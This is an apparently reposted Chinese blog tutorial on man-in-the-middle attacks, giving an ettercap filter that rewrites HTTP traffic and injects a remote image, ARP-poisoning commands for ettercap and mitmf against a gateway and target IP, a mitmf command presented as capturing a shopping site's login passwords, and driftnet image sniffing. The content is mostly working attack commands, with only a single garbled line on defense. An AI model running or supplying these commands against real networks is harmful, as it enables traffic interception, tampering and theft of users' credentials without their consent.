前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >中间人攻击在渗透测试中的利用

中间人攻击在渗透测试中的利用

作者头像
逍遥子大表哥
发布2021-12-17 16:06:35
6410
发布2021-12-17 16:06:35
举报
文章被收录于专栏:kali blog

工具介绍

  • ettercap
  • mitmtf
  • 3070网卡(大力推荐)

ettercap进行中间人攻击

替换图片

先利用vim新建一个 kali.filter

写入下面代码并保存

代码语言:javascript
复制
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      #note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

将其转变为二进制文件

代码语言:javascript
复制
etterfilter kali.filter -o kali.ef

执行命令

代码语言:javascript
复制
ettercap -T -q -F ig.ef -M ARP /目标ip///

效果如下

mitmf操作

替换网页中的图片

首先在root下创建一个img的文件夹,在文件夹中放入图片。

执行命令

代码语言:javascript
复制
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /root/img

PS: 192.168.5.1 为路由器网关 192.168.5.202 为目标。

访问某宝效果如下:

获取某宝登录密码

代码语言:javascript
复制
python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202

将所有的图片选择180°

代码语言:javascript
复制
python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202 --upsidedownternet

其他命令可以参考官网,这里不在演示。

嗅探浏览的图片

在通过ettercap进行中间人攻击后,我们可以利用driftnet来获取对方浏览的图片。命令如下:

代码语言:javascript
复制
driftnet -i waln0

防御

可以在路由器防火墙中开启arp攻击,来防御中间人攻击。

mitmf安装

参考文章:

kali安装MITMF

Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用,并利用 beef 强大的 hook ...

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 工具介绍
  • ettercap进行中间人攻击
  • 替换图片
  • mitmf操作
  • 替换网页中的图片
  • 获取某宝登录密码
  • 将所有的图片选择180°
  • 嗅探浏览的图片
  • 防御
  • mitmf安装
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档